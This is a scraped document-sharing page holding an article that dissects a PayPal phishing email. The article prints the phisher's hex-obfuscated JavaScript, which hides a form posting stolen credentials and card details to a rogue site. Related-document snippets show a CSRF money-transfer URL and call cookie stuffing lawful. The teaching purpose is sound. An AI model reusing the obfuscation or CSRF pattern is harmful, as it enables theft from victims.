Online Security: Breaking Down the Anatomy of a Phishing

Size: px
Start display at page:

Download "Online Security: Breaking Down the Anatomy of a Phishing"

Transcription

1 Online Security: Breaking Down the Anatomy of a Phishing In today s world where everyone s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you re in trouble. Here s a breakdown of one such attack we received. Don t think that it s just your banking details that are important: after all, if someone gains control over your account login they not only know the information contained in that account, but the odds are that same login information may be used on various other accounts. And if they compromise your account, they can reset all your other passwords. So in addition to keeping strong and varying passwords, you have to always be on the lookout for bogus s masquerading as the real thing. While most phishing attempts are amateurish, some are quite convincing so it is important to understand how to recognize them at surface level as well as how they work under the hood. Examining What is in Plain Sight Our example , like most phishing attempts, notifies you of activity on your PayPal account which would, under normal circumstances, be alarming. So the call to action is to verify/restore your account by submitting just about every piece of personal information you can think of. Again, this is pretty formulaic.

2 While there certainly are exceptions, pretty much every phishing and scam is loaded with red flags directly in the message themselves. Even if the text is convincing, you can usually find many mistakes littered throughout the message body which indicate the message is not legit. The Message Body At first glance, this is one of the better phishing s I have seen. There are no spelling or grammatical mistakes and the verbiage reads according to what you might expect. However, there are a few red flags you can see when you examine the content a bit more closely. Paypal The correct case is PayPal (capital P). You can see both variations are used in the message. Companies are very deliberate with their branding, so it is doubtful something like this would pass the proofing process. allow ActiveX How many times have you seen a legit web based business the size of Paypal use a proprietary component which only works on a single browser, especially when they

3 support multiple browsers? Sure, somewhere out there some company does it, but this is a red flag. securely. Notice how this word does not line up in the margin with the rest of the paragraph text. Even if I stretch the window a bit more, it doesn t wrap or space correctly. Paypal! The space before the exclamation mark looks awkward. Just another quirk which I am sure would not be in a legit . PayPal- Account Update Form.pdf.htm Why would Paypal attach a PDF especially when they could just link to a page on their site? Additionally, why would they try to disguise an HTML file as a PDF? This is the biggest red flag of them all. The Message Header When you take a look at the message header, a couple of more red flags appear: The from address is test@test.com. The to address is missing. I did not blank this out, it simply isn t part of the standard message header. Typically a company which has your name will personalize the to you. The Attachment When I open the attachment, you can immediately see the layout is not correct as it is missing style information. Again, why would PayPal an HTML form when they could simply give you a link on their site? Note: we used Gmail s built-in HTML attachment viewer for this, but we d recommend that you DO NOT OPEN attachments from scammers. Never. Ever. They very often contain exploits that will install trojans on your PC to steal your account info.

4 Scrolling down a bit more you can see that this form asks not only for our PayPal login information, but for banking and credit card information as well. Some of the images are broken.

5 It is obvious this phishing attempt is going after everything with one swoop.

6 The Technical Breakdown While it should be pretty clear based on what is in plain sight that this is a phishing attempt, we are now going to break down the technical makeup of the and see what we can find. Information from the Attachment The first thing to take a look at is the HTML source of the attachment form which is what submits the data to the bogus site. When quickly viewing the source, all the links appear valid as they point to either paypal.com or paypalobjects.com which are both legit. Now we are going to take a look at some basic page information Firefox gathers on the page.

7 As you can see, some of the graphics are pulled from the domains blessedtobe.com, goodhealthpharmacy.com and pic-upload.de instead of the legit PayPal domains.

8 Information from the Headers Next we will take a look at the raw message headers. Gmail makes this available via the Show Original menu option on the message.

9 Looking at the header information for the original message, you can see this message was composed using Outlook Express 6. I doubt PayPal has someone on staff which sends each of these messages manually via an outdated client. Now looking at the routing information, we can see the IP address of both the sender and the relaying mail server.

10 The User IP address is original sender. Doing a quick lookup on the IP information, we can see the sending IP is in Germany. And when we look at the relaying mail server s (mail.itak.at), IP address we can see this is an ISP based in Austria. I doubt PayPal routes their s directly through an Austria based ISP when they have a massive server farm which could easily handle this task.

11 Where Does the Data Go? So we have clearly determined this is a phishing and gathered some information about where the message originated from, but what about where your data is sent? To see this, we have to first save the HTM attachment do our desktop and open in a text editor. Scrolling through it, everything appears to be in order except when we get to a suspicious looking Javascript block.

12 Breaking out the full source of the last block of Javascript, we see: <script language= JavaScript type= text/javascript > // Copyright 2005 Voormedia var i,y,x= 3c666f726d206e616d653d226d61696e d226d61696e22206d f643d22706f f6e 3d a2f2f e f e6e65742f f f e e ;y= ;f or(i=0;i<x.length;i+=2){y+=unescape( % +x.substr(i,2));}document.write(y); < /script> Anytime you see a large jumbled string of seemingly random letters and numbers embedded in a Javascript block, it is usually something suspicious. Looking at the code, the variable x is set to this large string and then decoded into the variable y. The final result of variable y is then written to the document as HTML. Since the large string is made of numbers 0-9 and the letters a-f, it is most likely encoded via a simple ASCII to Hex conversion:

13 3c666f726d206e616d653d226d61696e d226d61696e22206d f6 43d22706f f6e3d a2f2f e f e6e65742f f f e e Translates to: <form name= main id= main method= post action= > It is not a coincidence that this decodes into a valid HTML form tag which sends the results not to PayPal, but to a rouge site. Additionally, when you view the HTML source of the form, you will see that this form tag is not visible because it is generated dynamically via the Javascript. This is a clever way to hide what the HTML is actually doing if someone were to simply view the generated source of the attachment (as we did earlier) as opposed to the opening the attachment directly in a text editor. Running a quick whois on the offending site, we can see this is a domain hosted at a popular web host, 1and1.

14 What stands out is the domain uses a readable name (as opposed to something like dfh3sjhskjhw.net ) and the domain has been registered for 4 years. Because of this, I believe this domain was hijacked and used as a pawn in this phishing attempt. Cynicism is a Good Defense When it comes to staying safe online, it never hurts to have a good bit of cynicism. While I am sure there are more red flags in the example , what we have pointed out above are indicators we saw after just a few minutes of examination. Hypothetically, if the surface level of the mimicked its legitimate counterpart 100%, the technical analysis would still reveal its true nature. This is why is it import to be able to examine both what you can and cannot see.

How to recognize phishing s

How to recognize phishing  s Phishing email messages, websites, and phone calls are designed to steal money, steal data and/or destroy information. Cybercriminals can do this by installing malicious software on your computer or stealing

More information

BEST PRACTICES FOR PERSONAL Security

BEST PRACTICES FOR PERSONAL  Security BEST PRACTICES FOR PERSONAL Email Security Sometimes it feels that the world of email and internet communication is fraught with dangers: malware, viruses, cyber attacks and so on. There are some simple

More information

Webomania Solutions Pvt. Ltd. 2017

Webomania Solutions Pvt. Ltd. 2017 The other name for link manipulation is Phishing or you can say link manipulation is type of phishing attack done generally to mislead the user to a replica website or a looka-like of some well-known site.

More information

Quick recap on ing Security Recap on where to find things on Belvidere website & a look at the Belvidere Facebook page

Quick recap on  ing  Security Recap on where to find things on Belvidere website & a look at the Belvidere Facebook page Workshop #7 Email Security Previous workshops 1. Introduction 2. Smart phones & Tablets 3. All about WatsApp 4. More on WatsApp 5. Surfing the Internet 6. Emailing Quick recap on Emailing Email Security

More information

RICH ENTERPRISES. Small Business Series. Getting Started with HTML

RICH ENTERPRISES. Small Business Series. Getting Started with HTML RICH ENTERPRISES Small Business Series Getting Started with HTML SMALL BUSINESS SERIES Getting Started With HTML Rich Enterprises 1512 Dietrich Road Twin Lakes, WI 53181 Phone/Fax 262-877-8630 Introduction

More information

PROTECTING YOUR BUSINESS ASSETS

PROTECTING YOUR BUSINESS ASSETS PROTECTING YOUR BUSINESS ASSETS How to Spot Danger Before Your Computer Gets Infected, Your Site Hosts Malware, and Your Credit Card Number Gets Stolen A MyNAMS Presentation by Regina Smola @2012 Regina

More information

Seema Sirpal Delhi University Computer Centre

Seema Sirpal Delhi University Computer Centre Getting Started on HTML & Web page Design Seema Sirpal Delhi University Computer Centre How to plan a web development project draft a design document convert text to HTML use Frontpage to create web pages

More information

2 User Guide. Contents

2  User Guide. Contents E-mail User Guide 2 E-mail User Guide Contents Logging in to your web mail... 3 Changing your password... 5 Editing your signature... 6 Adding an e-mail account to Outlook 2010/2013/2016... 7 Adding an

More information

Templates and Forms A Complete Overview for Connect Users

Templates and Forms A Complete Overview for Connect Users Templates and Forms A Complete Overview for Connect Users Chapter 1: Introduction... 3 Chapter 2: Microsoft Online Templates... 3 Word Templates... 3 Template Details... 4 Create a Template... 4 Update

More information

Accounts and Passwords

Accounts and Passwords Accounts and Passwords Hello, I m Kate and we re here to learn how to set up an account on a website. Many websites allow you to create a personal account. Your account will have its own username and password.

More information

Introduction. Logging in. WebMail User Guide

Introduction. Logging in. WebMail User Guide Introduction modusmail s WebMail allows you to access and manage your email, quarantine contents and your mailbox settings through the Internet. This user guide will walk you through each of the tasks

More information

Phishing. What do phishing s do?

Phishing. What do phishing  s do? Phishing We have become all too familiar with phishing emails but if that s the case, why do we as a community still fall victim? In this newsletter our goal is to provide you with some basic information

More information

3.5 SECURITY. How can you reduce the risk of getting a virus?

3.5 SECURITY. How can you reduce the risk of getting a virus? 3.5 SECURITY 3.5.4 MALWARE WHAT IS MALWARE? Malware, short for malicious software, is any software used to disrupt the computer s operation, gather sensitive information without your knowledge, or gain

More information

Contents. Management. Client. Choosing One 1/20/17

Contents.  Management.  Client. Choosing One 1/20/17 Contents Email Management CSCU9B2 Email clients choosing and using Email message header and content Emailing to lists of people In and out message management Mime attachments and HTML email SMTP, HTTP,

More information

Conveying Emotion. Chapter 12: Computers In Polite Society: Social Implications of IT. Improving the Effectiveness of . Problems with

Conveying Emotion. Chapter 12: Computers In Polite Society: Social Implications of IT. Improving the Effectiveness of  . Problems with Chapter 12: Computers In Polite Society: Social Implications of IT Fluency with Information Technology Third Edition by Lawrence Snyder Improving the Effectiveness of Email Problems with email: Conveying

More information

ELECTRONIC BANKING & ONLINE AUTHENTICATION

ELECTRONIC BANKING & ONLINE AUTHENTICATION ELECTRONIC BANKING & ONLINE AUTHENTICATION How Internet fraudsters are trying to trick you What you can do to stop them How multi-factor authentication and other new techniques can help HELPING YOU STAY

More information

Introduction. Logging in. WebQuarantine User Guide

Introduction. Logging in. WebQuarantine User Guide Introduction modusgate s WebQuarantine is a web application that allows you to access and manage your email quarantine. This user guide walks you through the tasks of managing your emails using the WebQuarantine

More information

Ages Donʼt Fall for Fake: Activity 1 Don t bite that phishing hook! Goals for children. Letʼs talk

Ages Donʼt Fall for Fake: Activity 1 Don t bite that phishing hook! Goals for children. Letʼs talk Ages 11-14 Donʼt Fall for : Activity 1 Don t bite that phishing hook! Children play a game where they study various emails and texts and try to decide which messages are legit and which are phishing scams.

More information

FIREFOX MENU REFERENCE This menu reference is available in a prettier format at

FIREFOX MENU REFERENCE This menu reference is available in a prettier format at FIREFOX MENU REFERENCE This menu reference is available in a prettier format at http://support.mozilla.com/en-us/kb/menu+reference FILE New Window New Tab Open Location Open File Close (Window) Close Tab

More information

Create strong passwords

Create strong passwords Create strong passwords Passwords are the first line of defense against break-ins to your online accounts and computer, tablet, or phone. Poorly chosen passwords can render your information vulnerable

More information

FAQ. Usually appear to be sent from official address

FAQ. Usually appear to be sent from official  address FAQ 1. What is Phishing Email? A form of fraud by which an attacker masquerades as a reputable entity in order to obtain your personal information. Usually appear to be sent from official email address

More information

Virtual Product Fair. Protect your agency data protect your business

Virtual Product Fair. Protect your agency data protect your business Virtual Product Fair Protect your agency data protect your business October 2011 2 Are you doing all that you can to protect your business? Agenda Background Fraudulent activities Sabre actions Steps you

More information

FileNET Guide for AHC PageMasters

FileNET Guide for AHC PageMasters ACADEMIC HEALTH CENTER 2 PageMasters have the permissions necessary to perform the following tasks with Site Tools: Application Requirements...3 Access FileNET...3 Login to FileNET...3 Navigate the Site...3

More information

If you re serious about Cookie Stuffing, take a look at Cookie Stuffing Script.

If you re serious about Cookie Stuffing, take a look at Cookie Stuffing Script. Cookie Stuffing What is Cookie Stuffing? Cookie Stuffing is a very mild form of black hat marketing, because in all honesty, this one doesn t break any laws. Certainly, it goes against the terms of service

More information

How to Build a Culture of Security

How to Build a Culture of Security How to Build a Culture of Security March 2016 Table of Contents You are the target... 3 Social Engineering & Phishing and Spear-Phishing... 4 Browsing the Internet & Social Networking... 5 Bringing Your

More information

PHISHING Takedown Process

PHISHING Takedown Process PHISHING Takedown Process CONGRATULATIONS, you just won a trip to the Bahamas! Update your password now! Please confirm your account information. You have a tax refund waiting for you. These are the common

More information

South Central Power Stop Scams

South Central Power Stop Scams Don t get tricked. People around the country have been receiving emails and phone calls from scammers. South Central Power wants to help you keep your money and prevent scams. Review the helpful tips below.

More information

Protecting from Attack in Office 365

Protecting  from Attack in Office 365 A hacker only needs one person to click on their fraudulent link to access credit card, debit card and Social Security numbers, names, addresses, proprietary information and other sensitive data. Protecting

More information

HTML TIPS FOR DESIGNING.

HTML TIPS FOR DESIGNING. This is the first column. Look at me, I m the second column.

More information

Overview Cross-Site Scripting (XSS) Christopher Lam Introduction Description Programming Languages used Types of Attacks Reasons for XSS Utilization Attack Scenarios Steps to an XSS Attack Compromises

More information

Welcome to the world of .

Welcome to the world of  . Welcome to the world of e-mail. E-mail, short for electronic mail, allows computer users to easily send messages back and forth between acquaintances around the world. There are a variety of ways to do

More information

Basic CMS User Guide

Basic CMS User Guide "We create exceptional business solutions for cash-pay healthcare professionals that enable them to realize their full potential." Basic CMS User Guide Version 1.2 3/28/2012 1 Table of Contents Table of

More information

Money Management Account

Money Management Account Money Management Account Overview Red represents debt accounts. Add An Account lets you add any account you want including loans, property, credit cards and investments. Click an account to edit it. Note:

More information

Online Scams. Ready to get started? Click on the green button to continue.

Online Scams. Ready to get started? Click on the green button to continue. Online Scams Hi, I m Kate. We re here to learn how to protect ourselves from online scams. We ll follow along with Kevin to learn what types of scams are out there, how to recognize the warning signs,

More information

The PKI Lie. The OWASP Foundation Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference

The PKI Lie. The OWASP Foundation  Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Copyright 2007 - The OWASP Foundation Permission is granted to copy,

More information

To learn more about Stickley on Security visit You can contact Jim Stickley at

To learn more about Stickley on Security visit   You can contact Jim Stickley at Thanks for attending this session on March 15th. To learn more about Stickley on Security visit www.stickleyonsecurity.com You can contact Jim Stickley at jim@stickleyonsecurity.com Have a great day! Fraud

More information

GOOGLE APPS. If you have difficulty using this program, please contact IT Personnel by phone at

GOOGLE APPS. If you have difficulty using this program, please contact IT Personnel by phone at : GOOGLE APPS Application: Usage: Program Link: Contact: is an electronic collaboration tool. As needed by any staff member http://www.google.com or http://drive.google.com If you have difficulty using

More information

IT Security Protecting Ourselves From Phishing Attempts. Ray Copeland Chief Information Officer (CIO)

IT Security Protecting Ourselves From Phishing Attempts. Ray Copeland Chief Information Officer (CIO) IT Security Protecting Ourselves From Phishing Attempts Ray Copeland Chief Information Officer (CIO) Phishing Defined The fraudulent practice of sending emails claiming to be from reputable people or companies

More information

Introduction To The New University Service. Bob Booth November 2010 AP- 2

Introduction To The New University  Service. Bob Booth November 2010 AP- 2 Introduction To The New University Email Service. Bob Booth November 2010 AP-Email2 University of Sheffield Contents 1. Introduction... 3 2. Accessing your Email... 4 3. Received Messages... 5 3.1 READING

More information

Using Google Mail In this lesson we will show you how to sign into and use your Google account (or Gmail as it s commonly known).

Using Google Mail In this lesson we will show you how to sign into and use your Google account (or Gmail as it s commonly known). Using Google Mail In this lesson we will show you how to sign into and use your Google account (or Gmail as it s commonly known). If you do not currently have an email account please use the Creating an

More information

Security and Privacy

Security and Privacy E-mail Security and Privacy Department of Computer Science Montclair State University Course : CMPT 320 Internet/Intranet Security Semester : Fall 2008 Student Instructor : Alex Chen : Dr. Stefan Robila

More information

On the Surface. Security Datasheet. Security Datasheet

On the Surface.  Security Datasheet.  Security Datasheet Email Security Datasheet Email Security Datasheet On the Surface No additional hardware or software required to achieve 99.9%+ spam and malware filtering effectiveness Initiate service by changing MX Record

More information

CLICK TO EDIT MASTER TITLE STYLE Fraud Overview and Mitigation Strategies

CLICK TO EDIT MASTER TITLE STYLE Fraud Overview and Mitigation Strategies Fraud Overview and Mitigation Strategies SUNTRUST TEAM: DOUG HICKMAN SENIOR VICE PRESIDENT FOUNDATIONS AND ENDOWMENTS SPECIALTY PRACTICE JAMES BERNAL ASSISTANT VICE PRESIDENT FOUNDATIONS AND ENDOWMENTS

More information

Web Security Computer Security Peter Reiher December 9, 2014

Web Security Computer Security Peter Reiher December 9, 2014 Web Security Computer Security Peter Reiher December 9, 2014 Page 1 Web Security Lots of Internet traffic is related to the web Much of it is financial in nature Also lots of private information flow around

More information

Layer by Layer: Protecting from Attack in Office 365

Layer by Layer: Protecting  from Attack in Office 365 Layer by Layer: Protecting Email from Attack in Office 365 Office 365 is the world s most popular office productivity suite, with user numbers expected to surpass 100 million in 2017. With the vast amount

More information

Samples of Features and Feature Stories CSc 190

Samples of Features and Feature Stories CSc 190 Samples of Features and Feature Stories CSc 190 The following un-prioritized Product Backlog contains the user stories for the thirteen Features that were written to describe the initial functionality

More information

WEB SECURITY: XSS & CSRF

WEB SECURITY: XSS & CSRF WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often

More information

c122jan2714.notebook January 27, 2014

c122jan2714.notebook January 27, 2014 Internet Developer 1 Start here! 2 3 Right click on screen and select View page source if you are in Firefox tells the browser you are using html. Next we have the tag and at the

More information

TIPS TO AVOID PHISHING SCAMS

TIPS TO AVOID PHISHING SCAMS TIPS TO AVOID PHISHING SCAMS WHAT IS PHISHING? Phishing is the use of fraudulent email, websites, text messages and phone calls to trick people into disclosing personal financial or identity information,

More information

Web Designer s Manual

Web Designer s Manual Web Designer s Manual web Design Guide Designed by: Tim Green Table of Contents Saving Set Up and Starting Tips pg 3-4 pg 13-14 Classes Page

More information

Deep Sea Phishing: Examples & Countermeasures

Deep Sea Phishing: Examples & Countermeasures Deep Sea Phishing: Examples & Countermeasures Phishing is impersonation of a person or brand. Our focus is email-based phishing. Phishing is not malware, spam, or xss, although these often coincide. Current

More information

Moving from FrameMaker to Blaze: Best Practices

Moving from FrameMaker to Blaze: Best Practices Moving from Adobe FrameMaker to MadCap Blaze is easy, although to get the best results you need to do some planning before you start. This document discusses suggestions and issues to make the import result

More information

FileNET Guide for AHC PageMasters

FileNET Guide for AHC PageMasters PageMasters have the permissions necessary to perform the following tasks with Site Tools: ACADEMIC HEALTH CENTER 2 Application Requirements...3 Access FileNET...3 Log in to FileNET...3 Navigate the Site...3

More information

SSAC Public Meeting Paris. 24 June 2008

SSAC Public Meeting Paris. 24 June 2008 SSAC Public Meeting Paris 1 in Phishing Attacks 2 What is? A phishing attack The attacker impersonates a registrar The phish emails are sent to The registrar's customers (bulk) A particular, targeted customer

More information

ORB Education Quality Teaching Resources

ORB Education Quality Teaching Resources JavaScript is one of the programming languages that make things happen in a web page. It is a fantastic way for students to get to grips with some of the basics of programming, whilst opening the door

More information

A Step-by-Step Guide to Survey Success

A Step-by-Step Guide to Survey Success A Step-by-Step Guide to Survey Success Table of Contents Why VerticalResponse?... 3 Quickstart Guide... 4 Step 1: Setup Your Account... 4 Step 2: Create Your Survey... 6 Step 3. Access Your Dashboard and

More information

P2_L12 Web Security Page 1

P2_L12 Web Security Page 1 P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction

More information

Phishing Attacks. Mendel Rosenblum. CS142 Lecture Notes - Phishing Attack

Phishing Attacks. Mendel Rosenblum. CS142 Lecture Notes - Phishing Attack Phishing Attacks Mendel Rosenblum Phishing Basic idea: Get unsuspecting users to visit an evil Web site Convince them that the evil Web site is actually a legitimate site (such as a bank or PayPal) Trick

More information

UT Tyler OU Campus Summer Training Series

UT Tyler OU Campus Summer Training Series UT Tyler OU Campus Summer Training Series Basic Training: Mastering Content Updates Your Web Team: Robin Kelly Webmaster James Mbewe-Web Developer Emily Battle-Web Content Coordinator uttyler.edu/web UT

More information

TABLE OF CONTENTS. Web Manual 08.01

TABLE OF CONTENTS. Web Manual 08.01 Webmaster Manual TABLE OF CONTENTS 1. Registering to edit your website... 3 2. Logging in to Edit your Website... 3 3. How to Edit a Page... 4 4. Edit Options Home (1 st Tab)... 5 5. Edit Options Objects

More information

(electronic mail) is the exchange of computer-stored messages by telecommunication.

(electronic mail) is the exchange of computer-stored messages by telecommunication. What is email? E-mail (electronic mail) is the exchange of computer-stored messages by telecommunication. E-mail is one of the protocols included with the Transport Control Protocol/Internet Protocol (TCP/IP)

More information

Introduction to

Introduction to Introduction to Email gcflearnfree.org/print/email101/introduction-to-email Introduction Do you ever feel like the only person who doesn't use email? You don't have to feel left out. If you're just getting

More information

Information Technology Virtual EMS Help https://msum.bookitadmin.minnstate.edu/ For More Information Please contact Information Technology Services at support@mnstate.edu or 218.477.2603 if you have questions

More information

Information Security CS 526 Topic 11

Information Security CS 526 Topic 11 Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive

More information

COMMON WAYS IDENTITY THEFT CAN HAPPEN:

COMMON WAYS IDENTITY THEFT CAN HAPPEN: COMMON WAYS IDENTITY THEFT CAN HAPPEN: OLD FASHIONED STEALING / DUMPSTER DIVING Thieves typically steal wallets and purses. They also steal mail such as credit card and bank statements, pre-approved credit

More information

Bank of america report phishing

Bank of america report phishing Search Search pages & people Search Search Search pages & people Search Bank of america report phishing email We recently discovered a new phishing scam from a Bank of America spam email some reports that

More information

Public Meeting Agenda Formatting Best Practices

Public Meeting Agenda Formatting Best Practices DEFINITIVE GUIDE Public Meeting Agenda Formatting Best Practices In this guide, we will first walk you through some best practices with text and images. Then, we will show you how to execute the best practices

More information

(Photos and Instructions Based on Microsoft Outlook 2007, Gmail, Yahoo! Mail, and Hotmail)

(Photos and Instructions Based on Microsoft Outlook 2007, Gmail, Yahoo! Mail, and Hotmail) Specific instructions on how to compose a professional e-mail using send and reply options, basic e-mail components, appropriate wording, content, tone, and examples of what not to do. (Photos and Instructions

More information

Pair projects due Thursday I do not anticipate giving any extensions for this assignment. 3/2/ Larry Snyder, CSE 1

Pair projects due Thursday I do not anticipate giving any extensions for this assignment. 3/2/ Larry Snyder, CSE 1 Pair projects due Thursday I do not anticipate giving any extensions for this assignment 3/2/15 2011 Larry Snyder, CSE 1 XML is essential for huge corporate systems. and for us Lawrence Snyder University

More information

HTML/CSS Lesson Plans

HTML/CSS Lesson Plans HTML/CSS Lesson Plans Course Outline 8 lessons x 1 hour Class size: 15-25 students Age: 10-12 years Requirements Computer for each student (or pair) and a classroom projector Pencil and paper Internet

More information

Spam Protection Guide

Spam  Protection Guide Spam Email Protection Guide Version 1.0 Last Modified 5/29/2014 by Mike Copening Contents Overview of Spam at RTS... 1 Types of Spam... 1 Spam Tricks... 2 Imitation of 3 rd Party Email Template... 2 Spoofed

More information

Product Backlog Document Template and Example

Product Backlog Document Template and Example Product Backlog Document Template and Example Introduction 1. Client Information (Name(s), Business, Location, contact information) 2. Team Information Team Member Names (contact information) 3. Project

More information

Full file at DW Chapter 2: Developing a Web Page

Full file at   DW Chapter 2: Developing a Web Page DW Chapter 2: Developing a Web Page TRUE/FALSE 1. To ensure that all links are current and work correctly, you need to test them regularly. ANS: T PTS: 1 REF: Dreamweaver 2-2 2. Too many text blocks, links,

More information

If a student logs in using the Google or Microsoft options on the bottom of the screen, they will get to the guest portal. If you have students

If a student logs in using the Google or Microsoft options on the bottom of the screen, they will get to the guest portal. If you have students 1 If a student logs in using the Google or Microsoft options on the bottom of the screen, they will get to the guest portal. If you have students saying I am logged in but I don t see form it is probably

More information

DoD Spear-Phishing Awareness Training. Joint Task Force - Global Network Operations

DoD Spear-Phishing Awareness Training. Joint Task Force - Global Network Operations //FOUO DoD Spear-Phishing Awareness Training Joint Task Force - Global Network Operations Updated: 16 NOV 2006 //FOUO Objective Inform and increase the awareness of all Department of Defense personnel

More information

NET 311 INFORMATION SECURITY

NET 311 INFORMATION SECURITY NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)

More information

Let s begin by naming the first folder you create Pictures.

Let s begin by naming the first folder you create Pictures. 1 Creating a Folder on Your Desktop Saving A Picture to Your Folder Creating Desktop Wallpaper from Pictures on the Internet Changing Your Home Page Creating a Shortcut to a Web Page on Your Desktop One

More information

to Stay Out of the Spam Folder

to Stay Out of the Spam Folder Tips and Tricks to Stay Out of the Spam Folder At SendGrid we are very serious about email deliverability. We live and breathe it each day. Similar to how Google keeps adjusting its search algorithm to

More information

Building Donation Forms in DonorSnap

Building Donation Forms in DonorSnap Building in DonorSnap Online Forms is a module that comes installed with DonorSnap. You create your own forms. Forms are built within DonorSnap, and the donation is recorded in the database (same as if

More information

Staying Safe on the Internet. Mark Schulman

Staying Safe on the Internet. Mark Schulman Staying Safe on the Internet Mark Schulman 1 Your Presenter Mark Schulman IT professional for almost 40 years No affiliation with any product 2 What We ll Talk About Passwords Email Safety Staying Safe

More information

EKTRON 101: THE BASICS

EKTRON 101: THE BASICS EKTRON 101: THE BASICS Table of Contents INTRODUCTION... 2 TERMINOLOGY... 2 WHY DO SOME PAGES LOOK DIFFERENT THAN OTHERS?... 5 LOGGING IN... 8 Choosing an edit mode... 10 Edit in context mode (easy editing)...

More information

GUIDE TO KEEPING YOUR SOCIAL MEDIA ACCOUNTS SECURE

GUIDE TO KEEPING YOUR SOCIAL MEDIA ACCOUNTS SECURE GUIDE TO KEEPING YOUR SOCIAL MEDIA ACCOUNTS SECURE TABLE OF CONTENTS PROTECTIVE MEASURES... 2 PREPARATION CHECKLIST... 2 IF YOU SUSPECT YOUR ACCOUNT IS COMPROMISED, THE FOLLOWING ACTIONS ARE ADVISED:...

More information

Introduction to Microsoft Office 2007

Introduction to Microsoft Office 2007 Introduction to Microsoft Office 2007 What s New follows: TABS Tabs denote general activity area. There are 7 basic tabs that run across the top. They include: Home, Insert, Page Layout, Review, and View

More information

Creating a Coaching

Creating a Coaching Creating a Coaching Email There are five main steps involved in creating a coaching email in the EMC: 1. Build the Message 2. Select the Audience 3. Review Delivery Details 4. Send Message to Delivery

More information

1. You re boring your audience

1. You re boring your audience 1. You re boring your audience OK, so you ve convinced your users to visit your landing page. Or even better they ve signed up for your mailing list. That s great! Now that you have their attention, the

More information

OU EDUCATE TRAINING MANUAL

OU EDUCATE TRAINING MANUAL OU EDUCATE TRAINING MANUAL OmniUpdate Web Content Management System El Camino College Staff Development 310-660-3868 Course Topics: Section 1: OU Educate Overview and Login Section 2: The OmniUpdate Interface

More information

Create-A-Page Design Documentation

Create-A-Page Design Documentation Create-A-Page Design Documentation Group 9 C r e a t e - A - P a g e This document contains a description of all development tools utilized by Create-A-Page, as well as sequence diagrams, the entity-relationship

More information

Website/Blog Admin Using WordPress

Website/Blog Admin Using WordPress Website/Blog Admin Using WordPress Table of Contents How to login... 2 How to get support... 2 About the WordPress dashboard... 3 WordPress pages vs posts... 3 How to add a new blog post... 5 How to edit

More information

shortcut Tap into learning NOW! Visit for a complete list of Short Cuts. Your Short Cut to Knowledge

shortcut Tap into learning NOW! Visit  for a complete list of Short Cuts. Your Short Cut to Knowledge shortcut Your Short Cut to Knowledge The following is an excerpt from a Short Cut published by one of the Pearson Education imprints. Short Cuts are short, concise, PDF documents designed specifically

More information

Tutorial 10: Programming with JavaScript

Tutorial 10: Programming with JavaScript Tutorial 10: Programming with JavaScript College of Computing & Information Technology King Abdulaziz University CPCS-665 Internet Technology Objectives Learn the history of JavaScript Create a script

More information

Outlook 2016 Guide. A Complete Overview for Connect Users

Outlook 2016 Guide. A Complete Overview for Connect Users Outlook 2016 Guide A Complete Overview for Connect Users Chapter 1: Introduction...8 Chapter 2: Getting Around Outlook...8 Quick Access Toolbar... 8 The Ribbon... 8 Backstage View... 9 Dialog Box Launcher...

More information

It is written in plain language: no jargon, nor formality. Information gets across faster when it s written in words that our users actually use.

It is written in plain language: no jargon, nor formality. Information gets across faster when it s written in words that our users actually use. Web Style Guide A style guide for use for writing on Tufts Library Websites and LibGuides. Contents: 1. Web style guides for online content 2. LibGuides 2-specific style guide 3. Tisch s website-specific

More information

Your username is the first portion of your address (first initial and last name) Your password is your date of birth in the form MMDDYY

Your username is the first portion of your  address (first initial and last name) Your password is your date of birth in the form MMDDYY ZIMBRA TRAINING This document will cover: Logging In Getting to Know the Layout Making Your Mail More Efficient Viewing by Message or Conversation Using Tags and Flags Creating Folders and Organizing Mail

More information

Figure 1 Forms category in the Insert panel. You set up a form by inserting it and configuring options through the Properties panel.

Figure 1 Forms category in the Insert panel. You set up a form by inserting it and configuring options through the Properties panel. Adobe Dreamweaver CS6 Project 3 guide How to create forms You can use forms to interact with or gather information from site visitors. With forms, visitors can provide feedback, sign a guest book, take

More information

EVERY NATION OUTLOOK WEB ACCESS (OWA) USER S GUIDE

EVERY NATION OUTLOOK WEB ACCESS (OWA) USER S GUIDE EVERY NATION OUTLOOK WEB ACCESS (OWA) USER S GUIDE Exchange 2003 Version Revised September 2005 TABLE OF CONTENTS WHAT S NEW IN OWA 2003?...2 General...2 Inbox and Message Composition...2 Tasks...2 INTRODUCTION

More information

IT & DATA SECURITY BREACH PREVENTION

IT & DATA SECURITY BREACH PREVENTION IT & DATA SECURITY BREACH PREVENTION A PRACTICAL GUIDE Part 1: Reducing Employee and Application Risks CONTENTS EMPLOYEES: IT security hygiene best practice APPLICATIONS: Make patching a priority AS CORPORATE

More information

Getting Started with the OIT Info Display

Getting Started with the OIT Info Display Getting Started with the OIT Info Display About the OIT Information Display: The OIT Information Display will serve as a method to post and to share business related information and announcements with

More information

Adobe Security Survey

Adobe Security Survey Adobe Security Survey October 2016 Edelman + Adobe INTRODUCTION Methodology Coinciding with National Cyber Security Awareness Month (NCSAM), Edelman Intelligence, on behalf of Adobe, conducted a nationally

More information

Dreamweaver CS6. Level 1. Topics Workspaces Basic HTML Basic CSS

Dreamweaver CS6. Level 1. Topics Workspaces Basic HTML Basic CSS Level 1 Topics Workspaces Basic HTML Basic CSS Tour the Workspace The arrangement of panels and menus you use to interact with a document is called the workspace. Much of Illustrator is customizable: you

More information

